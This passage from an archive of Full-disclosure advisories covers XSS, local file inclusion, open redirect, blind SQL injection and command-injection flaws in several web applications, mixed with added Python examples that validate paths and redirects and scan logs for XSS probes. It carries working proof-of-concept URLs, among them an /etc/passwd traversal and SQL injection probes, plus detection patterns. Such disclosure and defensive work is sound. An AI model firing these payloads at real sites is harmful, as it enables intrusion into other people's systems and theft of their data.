http://localhost/beatz/index.php?option=com_charts&view=charts&Itemid=76&chartkeyword=Acoustic&do=all%22%20style%3dbackground-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;%20x=%22&option=com_charts

== com_find (parameter: keyword)

http://localhost/beatz/index.php?do=listAll&keyword=++Search;img+src=0+onerror=prompt(/XSS/)&option=com_find

== com_videos (parameter: video_keyword)

http://localhost/beatz/index.php?option=com_videos&view=videos&Itemid=59&video_keyword=+style=width:1000px;height:1000px;position:absolute;left:0;top:0+onmouseover=alert(/xss/)&search=Search


6. SOLUTION

The vendor hasn't released the fix yet.


7. VENDOR

Cogzidel Technologies Pvt Ltd.
http://www.cogzidel.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-03-01: notified vendor
2012-04-15: vulnerability disclosed


10. REFERENCES

Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bbeatz_1.x%5D_xss

#yehg [2012-04-15]



[Full-disclosure] Open-Realty CMS 2.5.8 (2.x.x) <= select_users_template Local File Inclusion Vulnerability

2012-03-05 Thread YGN Ethical Hacker Group
1. OVERVIEW

Open-Realty 2.5.8 and lower versions are vulnerable to Local File Inclusion.


2. BACKGROUND

Open-Realty is the world's leading real estate listing marketing and
management CMS application, and has enjoyed being the real estate web
site software of choice for professional web site developers since
2002.


3. VULNERABILITY DESCRIPTION

Open-Realty contains a flaw that may allow a remote attacker to
execute arbitrary commands or code. The issue is due to the
'index.php' script not properly sanitizing user input, specifically
directory traversal style attacks (e.g., ../../) supplied to the
'select_users_template' parameter. This may allow an attacker to
include a file from the targeted host that contains arbitrary commands
or code that will be executed by the vulnerable script. Such attacks
are limited due to the script only calling files already on the target
host. In addition, this flaw can potentially be used to disclose the
contents of any file on the system accessible by the web server.


4. VERSIONS AFFECTED

2.5.8 (2.x.x) <=


5. PROOF-OF-CONCEPT/EXPLOIT

http://localhost/open-realty2.5.8/?select_users_template=../../../../../../../../../../../../../../../etc/passwd%00


6. SOLUTION

The 2.5.x version family is no longer maintained by the vendor.
Version 3.x.x is not found to be vulnerable to this issue. Upgrade
to the latest 3.x.x version.


7. VENDOR

Transparent Technologies Inc.
http://www.transparent-support.com


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-03-05: Open-Realty 2.5.8 in End-of-Support/Maintenance cycle
2012-03-05: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bopen-realty_2.5.8_2.x%5D_lfi
Open-Realty Home Page: http://www.open-realty.org/
CWE-98: Improper Control of Filename for Include/Require Statement in
PHP Program ('PHP File Inclusion')
CAPEC-252: PHP Local File Inclusion


#yehg [2012-03-05]


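The Acuity file-manager advisories above (unrestricted upload of `0wned.asp` to a client-chosen `path`, and `browse.asp?path=../../`) and this Open-Realty advisory (`select_users_template=../../../../etc/passwd%00`) are the same class of defect: a user-supplied path or name reaches the filesystem unconfined. As an added example (not code from any of these products), the block below shows one containment routine serving all three cases, plus the upload-name allowlist that also catches `shell.asp.jpg`; `DEMO_WEBROOT`, `DEMO_TEMPLATES`, the `.html` template extension and the extension sets are assumptions.

```python
import os
import re
import tempfile
from pathlib import Path

# Constructed demo locations (placeholders; they need not exist on disk).
DEMO_WEBROOT = os.path.join(tempfile.gettempdir(), "acuity_webroot")
DEMO_TEMPLATES = os.path.join(tempfile.gettempdir(), "open_realty_templates")

# Final extensions a photo/document manager may accept, and extensions the
# web server would execute if they appeared anywhere in the name (assumed sets).
ALLOWED_UPLOAD_EXT = {".jpg", ".jpeg", ".png", ".gif", ".pdf"}
EXECUTABLE_EXT = {".asp", ".aspx", ".asa", ".cer", ".php", ".phtml", ".jsp"}
SAFE_NAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,99}")
TEMPLATE_NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


class UnsafePathError(ValueError):
    """Raised for any user-supplied path or name that must not reach the filesystem."""


def resolve_within_root(root: str, user_path: str) -> Path:
    """Resolve `user_path` under `root` and refuse anything that escapes it.
    Covers the browse.asp 'path=../../' case and the '%00' truncation trick."""
    if "\x00" in user_path:
        raise UnsafePathError("NUL byte in path")
    if "\\" in user_path:
        raise UnsafePathError("backslash in path")
    root_real = Path(root).resolve()
    candidate = (root_real / user_path.lstrip("/")).resolve()
    try:
        candidate.relative_to(root_real)
    except ValueError:
        raise UnsafePathError(f"path escapes root: {user_path!r}") from None
    return candidate


def template_path(templates_root: str, name: str, ext: str = ".html") -> Path:
    """Template selector for an include(): allowlist the name, append the
    extension server-side, then still confine the result to the templates
    directory.  The '.html' extension is an assumption for the demo."""
    if not TEMPLATE_NAME_RE.fullmatch(name):
        raise UnsafePathError(f"template name rejected: {name!r}")
    return resolve_within_root(templates_root, name + ext)


def safe_upload_destination(webroot: str, directory: str, filename: str) -> Path:
    """Where file_upload_submit.asp-style code should write an upload: the
    client-chosen directory is confined to the web root, and the name is
    checked against an allowlist that also catches 'shell.asp.jpg'."""
    base = os.path.basename(filename.replace("\\", "/"))  # drop client directories
    if not SAFE_NAME_RE.fullmatch(base):
        raise UnsafePathError(f"file name rejected: {filename!r}")
    suffixes = [s.lower() for s in Path(base).suffixes]
    if not suffixes or suffixes[-1] not in ALLOWED_UPLOAD_EXT:
        raise UnsafePathError(f"file type not allowed: {base!r}")
    if any(s in EXECUTABLE_EXT for s in suffixes[:-1]):
        raise UnsafePathError(f"executable inner extension: {base!r}")
    return resolve_within_root(webroot, directory) / base


def is_rejected(fn, *args) -> bool:
    """True when the check refuses the input (handy for demos and tests)."""
    try:
        fn(*args)
    except UnsafePathError:
        return True
    return False


if __name__ == "__main__":
    # Inputs taken from the advisories' PoCs, plus benign ones for contrast.
    checks = [
        (safe_upload_destination, DEMO_WEBROOT, "/images", "0wned.asp"),
        (safe_upload_destination, DEMO_WEBROOT, "/images", "shell.asp.jpg"),
        (safe_upload_destination, DEMO_WEBROOT, "/images", "logo.png"),
        (resolve_within_root, DEMO_WEBROOT, "../../"),
        (template_path, DEMO_TEMPLATES, "../../../../../../../etc/passwd\x00"),
        (template_path, DEMO_TEMPLATES, "default"),
    ]
    for fn, *args in checks:
        print(f"{fn.__name__}{tuple(args[1:])!r:55} rejected={is_rejected(fn, *args)}")
```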

[Full-disclosure] Etano 1.x <= Multiple Cross Site Scripting Vulnerabilities

2012-03-05 Thread YGN Ethical Hacker Group
1. OVERVIEW

Etano 1.x versions are vulnerable to Cross Site Scripting.


2. BACKGROUND

The community builder script we provide - Etano - was built entirely
based on requests from customers of our previous dating package
(Dating Site Builder). Almost every feature ever requested was built
into Etano to help you build a better site for your community members.
You can use Etano to start up a dating site, a social networking site,
a classifieds site or any other type of site involving groups of
people, companies, products.


3. VULNERABILITY DESCRIPTION

Multiple parameters were not properly sanitized upon submission to
join.php, search.php, photo_search.php and photo_view.php, which
allows an attacker to conduct a Cross Site Scripting attack. This may
allow an attacker to create a specially crafted URL that would execute
arbitrary script code in a victim's browser.


4. VERSIONS AFFECTED

Tested in 1.x versions (1.20-1.22)


5. PROOF-OF-CONCEPT/EXPLOIT

URL: http://localhost/etano/join.php
Method: POST
Vulnerable Parameters: user, email, email2, f17_zip, agree



URL: http://localhost/etano/search.php
Method: GET
Vulnerable Parameters: QUERY STRING, st, f17_city, f17_country,
f17_state, f17_zip, f19, wphoto, search, v, return


http://localhost/etano/search.php?'scriptalert(/XSS/)/script

http://localhost/etano/search.php?st='scriptalert(/XSS/)/script

http://localhost/etano/search.php?f17_city='scriptalert(/XSS/)/script&f17_country=0&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto=1

http://localhost/etano/search.php?f17_city=0&f17_country='scriptalert(/XSS/)/script&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto=1

http://localhost/etano/search.php?f17_city=0&f17_country=0&f17_state='scriptalert(/XSS/)/script&f17_zip=3&f19=0&st=basic&wphoto=1

http://localhost/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip='scriptalert(/XSS/)/script&f19=0&st=basic&wphoto=1

http://localhost/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19='scriptalert(/XSS/)/script&st=basic&wphoto=1

http://localhost/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19=0&st='scriptalert(/XSS/)/script&wphoto=1

http://localhost/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto='scriptalert(/XSS/)/script

http://localhost/etano/search.php?search='scriptalert(/XSS/)/script&v=g

http://localhost/etano/search.php?search=51d43831f5dde83a4eedb23895f165f6&v='scriptalert(/XSS/)/script

http://localhost/etano/search.php?st=xss;scriptalert(/XSS/)/script&user=unknown



URL: http://localhost/etano/photo_search.php
Method: GET
Vulnerable Parameters: QUERY STRING, st, return

http://localhost/etano/photo_search.php?'scriptalert(/XSS/)/script

http://localhost/etano/photo_search.php?st='scriptalert(/XSS/)/script



URL: http://localhost/etano/photo_view.php
Method: GET
Vulnerable Parameter: return

http://localhost/etano/photo_view.php?photo_id=1&return=;scriptalert(/XSS/)/script


6. SOLUTION

The vendor hasn't released the fix yet.


7. VENDOR

Datemill
http://www.datemill.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-06-21: notified vendor
2012-03-05: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Betano_1.2.x%5D_xss


#yehg [2012-03-05]



[Full-disclosure] OxWall 1.1.1 <= Multiple Cross Site Scripting Vulnerabilities

2012-02-21 Thread YGN Ethical Hacker Group
1. OVERVIEW

OxWall 1.1.1 and lower versions are vulnerable to Cross Site Scripting.


2. BACKGROUND

Oxwall is a free open source software package for building social
networks, family sites and collaboration systems. It is a flexible
community website engine developed with the aim to provide people with
a well-coded, user-friendly software platform for social needs. It is
easy to set up, configure and manage Oxwall while you focus on your
site idea. We are testing the concept of free open source community
software for complete (site,sub-site setups) and partial
(widgets,features) community and collaboration solutions for companies
and individuals.


3. VULNERABILITY DESCRIPTION

Multiple parameters were not properly sanitized, which allows an
attacker to conduct a Cross Site Scripting attack. This may allow an
attacker to create a specially crafted URL that would execute arbitrary
script code in a victim's browser.


4. VERSIONS AFFECTED

1.1.1 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

URL: http://localhost/Oxwall/join

Injected Attack String: 'scriptalert(/XSS/)/script
Method: HTTP POST
Vulnerable Parameters: captchaField, email, form_name, password,
realname, repeatPassword, username



URL: http://localhost/Oxwall/contact

Injected Attack String: 'scriptalert(/XSS/)/script
Method: HTTP POST
Vulnerable Parameters: captcha, email, form_name, from, subject


URL: http://localhost/Oxwall/blogs/browse-by-tag?tag=%27%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
Vulnerable Parameter: tag



Vulnerable Parameter: RAW-URI

http://localhost/Oxwall/photo/viewlist/tagged/img src=xs onerror=alert('XSS')

http://localhost/Oxwall/photo/viewlist/%22style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22onmouseover=alert%28%27XSS%27%29;%22x=

http://localhost/Oxwall/video/viewlist/%22style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22onmouseover=alert%28%27XSS%27%29;%22x=


6. SOLUTION

Upgrade to the latest version of Oxwall.


7. VENDOR

Oxwall Foundation
http://www.oxwall.org/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-06-09: notified vendor
2012-02-20: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5BOxWall_1.1.1%5D_xss
Oxwall Home Page: http://www.oxwall.org/


#yehg [2012-02-20]



[Full-disclosure] Dolphin 7.0.7 <= Multiple Cross Site Scripting Vulnerabilities

2012-02-21 Thread YGN Ethical Hacker Group
1. OVERVIEW

Dolphin 7.0.7 and lower versions are vulnerable to Cross Site Scripting.


2. BACKGROUND

Dolphin is the only all-in-one free community software platform for
creating your own social networking, community or online dating site
without any limits and under your full control. Dolphin comes with
hundreds of features, module plugins and tools. Everything is included
and extension possibilities are literally endless. You can use it for
free with a BoonEx link in the footer or buy a $99 permanent license
to remove that requirement.


3. VULNERABILITY DESCRIPTION

Multiple parameters (explain, photos_only, online_only, mode) were not
properly sanitized, which allows an attacker to conduct a Cross Site
Scripting attack. This may allow an attacker to create a specially
crafted URL that would execute arbitrary script code in a victim's
browser.


4. VERSIONS AFFECTED

7.0.7 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

Vulnerable Parameter: explain

http://localhost/dolph/explanation.php?explain=%27%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E


Vulnerable Parameters: photos_only,online_only,mode

http://localhost/dolph/viewFriends.php?iUser=1&page=1&per_page=32&sort=activity&photos_only='scriptalert(/xss/)/script

http://localhost/dolph/viewFriends.php?iUser=1&page=1&per_page=32&sort=activity&online_only='scriptalert(/xss/)/script

http://localhost/dolph/viewFriends.php?iUser=1&page=1&sort=activity&mode='scriptalert(/xss/)/script


6. SOLUTION

Upgrade to the latest version of Dolphin.


7. VENDOR

BoonEx Pty Ltd
http://www.boonex.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-06-09: notified vendor
2011-10-24: fixed version, 7.0.8, released
2012-02-20: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5BDolphin_7.0.7%5D_xss
BoonEx Home Page: http://www.boonex.com/


#yehg [2012-02-20]


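The reflected XSS advisories above (FastPath, Beatz, Etano, OxWall, Dolphin) share a handful of payload shapes: a `<script>` element, an injected `<img>` with an event handler, a `javascript:` URL, or a `style=`/`onmouseover=` pair, sometimes percent-encoded twice (the Beatz "Double Encoding" PoC) and sometimes placed in the path rather than the query (the OxWall RAW-URI cases). As an added example (not code from any of these projects), the block below decodes each request URI until it stops changing and then scans path and query for those markers, over a constructed common-log-format sample whose client addresses are RFC 5737 documentation ranges.

```python
import re
from urllib.parse import unquote_plus

# Common log format line (the constructed sample below uses this shape).
ACCESS_LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Markers of the payload styles seen across these advisories.  Event-handler
# names are listed explicitly so legitimate parameters such as 'option=' or
# 'online_only=' do not match; the lookbehind rejects handlers glued to a word.
PROBE_RE = re.compile(
    r"<\s*/?\s*script\b|<\s*img\b|javascript:"
    r"|(?<![a-z0-9_])on(?:error|load|mouseover|mouseout|click|focus|blur)\s*=",
    re.I,
)


def decode_fully(value: str, max_rounds: int = 3):
    """Percent-decode until the value stops changing.  The Joomla! double
    encoding PoC (%2522%253e...) only becomes '"><script>' after two rounds."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def classify_uri(uri: str) -> dict:
    """Look for probe markers in the path *and* the query after full decoding."""
    decoded, rounds = decode_fully(uri)
    matches = [m.group(0) for m in PROBE_RE.finditer(decoded)]
    return {
        "path": uri.partition("?")[0],
        "decode_rounds": rounds,
        "probe": bool(matches),
        "double_encoded": bool(matches) and rounds >= 2,
        "matches": matches,
    }


def scan_access_log(lines):
    """One finding per request whose URI carries an XSS probe."""
    findings = []
    for line in lines:
        m = ACCESS_LINE_RE.match(line)
        if not m:
            continue
        verdict = classify_uri(m["uri"])
        if verdict["probe"]:
            findings.append({"ip": m["ip"], "status": m["status"], **verdict})
    return findings


# Constructed sample log: the PoC shapes from the Beatz, Dolphin and Oxwall
# advisories plus two benign requests, one of them double-encoded but harmless.
SAMPLE_LOG = [
    '203.0.113.9 - - [15/Apr/2012:10:00:00 +0000] "GET /beatz/?option=com_content'
    '&view=frontpage&limitstart=5%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e HTTP/1.1" 200 512',
    '203.0.113.9 - - [15/Apr/2012:10:00:01 +0000] "GET /dolph/explanation.php'
    '?explain=%27%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E HTTP/1.1" 200 734',
    '198.51.100.4 - - [15/Apr/2012:10:00:02 +0000] "GET /Oxwall/photo/viewlist/'
    '%22style%3d%22position:fixed%22onmouseover=alert%28%27XSS%27%29;%22x= HTTP/1.1" 200 901',
    '192.0.2.17 - - [15/Apr/2012:10:00:03 +0000] "GET /beatz/index.php?option=com_videos'
    '&view=videos&Itemid=59&video_keyword=acoustic&search=Search HTTP/1.1" 200 3320',
    '192.0.2.17 - - [15/Apr/2012:10:00:04 +0000] "GET /beatz/index.php?option=com_find'
    '&keyword=100%2525%2520off HTTP/1.1" 200 2210',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        tag = "double-encoded " if f["double_encoded"] else ""
        print(f"{f['ip']:14} {tag}probe on {f['path']}: {f['matches']}")
```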

[Full-disclosure] CubeCart 3.0.20 (3.0.x) and lower | Open URL Redirection Vulnerability [Updated]

2012-02-19 Thread YGN Ethical Hacker Group
1. OVERVIEW

The CubeCart 3.0.20 and lower versions are vulnerable to Open URL Redirection.


2. BACKGROUND

CubeCart is an out of the box ecommerce shopping cart software
solution which has been written to run on servers that have PHP &
MySQL support. With CubeCart you can quickly set up a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.


3. VULNERABILITY DESCRIPTION

The CubeCart 3.0.20 and lower versions contain a flaw that allows a
remote cross site redirection attack. This flaw exists because the
application does not properly sanitise the parameters goto, r and
redir. This allows an attacker to create a specially crafted URL,
that if clicked, would redirect a victim from the intended legitimate
web site to an arbitrary web site of the attacker's choice.


4. VERSIONS AFFECTED

3.0.20 and lower (aka 3.0.x family)


5. PROOF-OF-CONCEPT/EXPLOIT

http://localhost/cube3.0.20/switch.php?r=//yehg.net/&lang=es
http://localhost/cube3.0.20/admin/login.php?goto=//yehg.net
http://localhost/cube/index.php?act=login&redir=Ly95ZWhnLm5ldC8%3D
http://localhost/cube/cart.php?act=reg&redir=L2N1YmUvaW5kZXgucGhwP2FjdD1sb2dpbg%3D%3D


6. SOLUTION

The CubeCart 3.0.x version family is no longer maintained by the vendor.


7. VENDOR

CubeCart Development Team
http://cubecart.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-02-10: CubeCart 3.0.x in End-of-Support/Maintenance cycle
2012-02-10: Vulnerability disclosed
2012-02-19: Vulnerability updated


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[cubecart_3.0.20_3.0.x]_open_url_redirection
CubeCart Home Page: http://cubecart.com/
OWASP Top 10 2010 - A 10:
http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards
SANS Top 25: http://cwe.mitre.org/top25/#CWE-601
CWE-601: http://cwe.mitre.org/data/definitions/601.html


11. CHANGE LOG

This advisory was updated on 2012-02-19 with one additional vulnerable
parameter, redir.


#yehg [2012-02-10]
last updated: 2012-02-19



[Full-disclosure] CubeCart 3.0.20 (3.0.x) and lower | Open URL Redirection Vulnerability

2012-02-10 Thread YGN Ethical Hacker Group
1. OVERVIEW

The CubeCart 3.0.20 and lower versions are vulnerable to Open URL Redirection.


2. BACKGROUND

CubeCart is an out of the box ecommerce shopping cart software
solution which has been written to run on servers that have PHP &
MySQL support. With CubeCart you can quickly set up a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.


3. VULNERABILITY DESCRIPTION

The CubeCart 3.0.20 and lower versions contain a flaw that allows a
remote cross site redirection attack. This flaw exists because the
application does not properly sanitise the parameters goto and r.
This allows an attacker to create a specially crafted URL, that if
clicked, would redirect a victim from the intended legitimate web site
(domain.com) to an arbitrary web site (localhost) of the attacker's
choice.


4. VERSIONS AFFECTED

3.0.20 and lower (aka 3.0.x family)


5. PROOF-OF-CONCEPT/EXPLOIT

http://localhost/cube3.0.20/switch.php?r=//yehg.net/&lang=es
http://localhost/cube3.0.20/admin/login.php?goto=//yehg.net


6. SOLUTION

The CubeCart 3.0.x version family is no longer maintained by the vendor.
Upgrade to CubeCart 4.x/5.x.


7. VENDOR

CubeCart Development Team
http://cubecart.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-02-10: CubeCart 3.0.x in End-of-Support/Maintenance cycle
2012-02-10: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[cubecart_3.0.20_3.0.x]_open_url_redirection
CubeCart Home Page: http://cubecart.com/
OWASP Top 10 2010 - A 10:
http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards
SANS Top 25: http://cwe.mitre.org/top25/#CWE-601
CWE-601: http://cwe.mitre.org/data/definitions/601.html

#yehg [2012-02-10]


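The ocPortal `redirect` advisory and the two CubeCart advisories above describe the same defect: a redirect target is taken from the request and sent back in a Location header unchecked, whether as a plain URL (`redirect`, `goto`, `r`), a scheme-relative `//host` form, or base64-wrapped as CubeCart's `redir` (the PoC value `Ly95ZWhnLm5ldC8=` decodes to `//yehg.net/`). As an added example (not code from ocPortal or CubeCart), the block below shows a validator that undoes the transport encoding and then honours only a path on the application's own origin; `SITE_ORIGIN`, the `BASE64_PARAMS` set and the assumption that query values arrive already percent-decoded are the example's own.

```python
import base64
import binascii
from urllib.parse import urlsplit, urljoin

# Assumed deployment origin (placeholder); only targets that stay on it are honoured.
SITE_ORIGIN = "https://shop.example"
SAFE_FALLBACK = "/"

# CubeCart's `redir` parameter carries a base64-encoded URL in the advisory's
# PoC; `goto`, `r` and ocPortal's `redirect` carry the URL in plain form.
BASE64_PARAMS = {"redir"}


def decode_redirect_value(param: str, raw: str) -> str:
    """Undo the parameter's transport encoding.  Query values are assumed to
    be percent-decoded already (as a web framework does); an undecodable
    base64 value yields '' so that it fails the checks below."""
    if param not in BASE64_PARAMS:
        return raw
    try:
        return base64.b64decode(raw, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return ""


def is_local_path(target: str) -> bool:
    """Accept only a path on this site.  Rejects absolute URLs, scheme-relative
    '//host' URLs, the '/\\host' form browsers also treat as scheme-relative,
    backslashes, and control characters that could split headers."""
    if not target.startswith("/") or target.startswith(("//", "/\\")):
        return False
    if any(c in target for c in "\r\n\x00") or "\\" in target:
        return False
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:
        return False
    # Belt and braces: resolving it against our origin must not change the host.
    resolved = urlsplit(urljoin(SITE_ORIGIN + "/", target))
    return resolved.netloc == urlsplit(SITE_ORIGIN).netloc


def safe_redirect(param: str, raw: str) -> str:
    """Value a login/switch handler should put in its Location header."""
    target = decode_redirect_value(param, raw)
    return target if is_local_path(target) else SAFE_FALLBACK


if __name__ == "__main__":
    # Values as the advisories' PoC URLs deliver them after percent-decoding.
    for param, raw in [("redirect", "http://attacker.in"),
                       ("r", "//yehg.net/"),
                       ("redir", "Ly95ZWhnLm5ldC8="),
                       ("redir", "L2N1YmUvaW5kZXgucGhwP2FjdD1sb2dpbg=="),
                       ("goto", "/admin/index.php")]:
        print(f"{param}={raw!r:45} -> Location: {safe_redirect(param, raw)}")
```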

[Full-disclosure] zFtp Server <= 2011-04-13 | STAT, CWD Remote Denial of Service Vulnerability

2011-10-25 Thread YGN Ethical Hacker Group
zFtp Server <= 2011-04-13 | STAT, CWD Remote Denial of Service Vulnerability


1. OVERVIEW

The zFTP server is found to be vulnerable to denial of service in
handling multiple STAT and CWD command requests.


2. BACKGROUND

The zFTP server is a Windows based FTP server with focus on clever
Active Directory integration and powerful, effortless administration.


3. VERSIONS AFFECTED

2011-04-13 and earlier


4. PROOF-OF-CONCEPT/EXPLOIT

http://www.exploit-db.com/exploits/18028/


5. SOLUTION

The vendor has released the patched version
(http://download.zftpserver.com/zFTPServer_Suite_Setup.exe)


6. VENDOR

Vastgota-Data


7. CREDIT

This vulnerability was discovered by Myo Soe, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


8. DISCLOSURE TIME-LINE

2011-06-19: notified vendor through email
2011-10-17: vendor released fixed version, 2011-10-17
2011-10-25: vulnerability disclosed


9. REFERENCES

Original Advisory URL:
http://core.yehg.net/lab/pr0js/advisories/%5Bzftpserver_2011-04-13%5D_stat,cwd_dos
zFTP Server Home Page: http://zftpserver.com


#yehg [2011-10-25]



[Full-disclosure] vTiger CRM 5.2.x <= Remote Code Execution Vulnerability

2011-10-05 Thread YGN Ethical Hacker Group
vTiger CRM 5.2.x <= Remote Code Execution Vulnerability


1. OVERVIEW

The vTiger CRM 5.2.1 and lower versions are vulnerable to Remote Code
Execution. No fixed version has been released as of 2011-10-05.


2. BACKGROUND

vtiger CRM is a free, full-featured, 100% Open Source CRM software
ideal for small and medium businesses, with low-cost product support
available to production users that need reliable support. vtiger CRM
is a widely used product with thousands of users in dozens of
countries.  It has a vibrant community of users driving the product
forward, and contributing to its development.  Over 2 million copies
of vtiger CRM have been downloaded so far. It was launched as a fork
of version 1.0 of the SugarCRM project launched on December 31st,
2004.


3. VULNERABILITY DESCRIPTION

vTiger bundles a vulnerable version of the PHPMailer class at
/cron/class.phpmailer.php. In SendmailSend() the Sender address is
interpolated into the sendmail command line without shell escaping (the
issue tracked as CVE-2007-3215 in the references below), so a crafted
sender address can inject arbitrary shell commands.


4. VERSIONS AFFECTED

Tested on 5.2.1


5. PROOF-OF-CONCEPT/EXPLOIT

File: /cron/class.phpmailer.php
[code]

391: function SendmailSend($header, $body) {
392:   if ($this->Sender != '')
393:     $sendmail = sprintf("%s -oi -f %s -t", $this->Sendmail, $this->Sender);
394:   else
395:     $sendmail = sprintf("%s -oi -t", $this->Sendmail);

[/code]


6. SOLUTION

The vendor hasn't attempted to incorporate the latest version of
phpMailer class in their vTigerCRM as of version 5.2.1.

The flawed code portion can be patched with:

393:     $sendmail = sprintf("%s -oi -f %s -t", escapeshellcmd($this->Sendmail), escapeshellarg($this->Sender));
395:     $sendmail = sprintf("%s -oi -t", escapeshellcmd($this->Sendmail));


7. VENDOR

vTiger Development Team
http://www.vtiger.com/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-12-08: notified vendor
2011-10-05: no fixed version released yet
2011-10-05: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5BvTiger_5.2.1%5D_rce
Wiki VtigerCRM: https://secure.wikimedia.org/wikipedia/en/wiki/Vtiger_CRM
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3215

#yehg [2011-10-05]



[Full-disclosure] vTiger CRM <= 5.2.x Blind SQL Injection Vulnerability

2011-10-05 Thread YGN Ethical Hacker Group
vTiger CRM <= 5.2.x Blind SQL Injection Vulnerability



1. OVERVIEW

The vTiger CRM 5.2.1 and lower versions are vulnerable to Blind SQL
Injection. No fixed version has been released as of 2011-10-05.


2. BACKGROUND

vtiger CRM is a free, full-featured, 100% Open Source CRM software
ideal for small and medium businesses, with low-cost product support
available to production users that need reliable support. vtiger CRM
is a widely used product with thousands of users in dozens of
countries.  It has a vibrant community of users driving the product
forward, and contributing to its development. Over 2 million copies
of vtiger CRM have been downloaded so far. It was launched as a fork
of version 1.0 of the SugarCRM project launched on December 31st,
2004.


3. VULNERABILITY DESCRIPTION

The onlyforuser parameter is not properly sanitized, which allows an
attacker to conduct a Blind SQL Injection attack. This could allow an
attacker to inject or manipulate SQL queries in the back-end database,
allowing for the manipulation or disclosure of arbitrary data.


4. VERSIONS AFFECTED

Tested on 5.2.1


5. PROOF-OF-CONCEPT/EXPLOIT

A future calendar event must be created in advance to trigger this
vulnerability.

Verified with Simple 1=1 Boolean check
-

/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+1%3d1--

/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+1%3d2--


Verified with MySQL @@version check
-

/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+@@version%3d5--

/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+@@version%3d4--


6. SOLUTION

No patched version is available yet.
The vendor hasn't attempted to fix the issues though they acknowledged
the report.


7. VENDOR

vTiger Development Team
http://www.vtiger.com/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-12-08: notified vendor
2011-10-05: no fixed version released yet
2011-10-05: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5BvTiger_5.2.1%5D_blind_sqlin
Wiki VtigerCRM: https://secure.wikimedia.org/wikipedia/en/wiki/Vtiger_CRM


#yehg [2011-10-05]



[Full-disclosure] vTiger CRM <= 5.2.x Multiple Cross Site Scripting Vulnerabilities

2011-10-04 Thread YGN Ethical Hacker Group
%20onmouseover%3d%27javascript:alert%28/XSS/%29%27%20x=%27&parenttab=My&onlyforuser=1


Parameter:  type

Note: Move your mouse over the texts Potential No., Potential Name,..etc
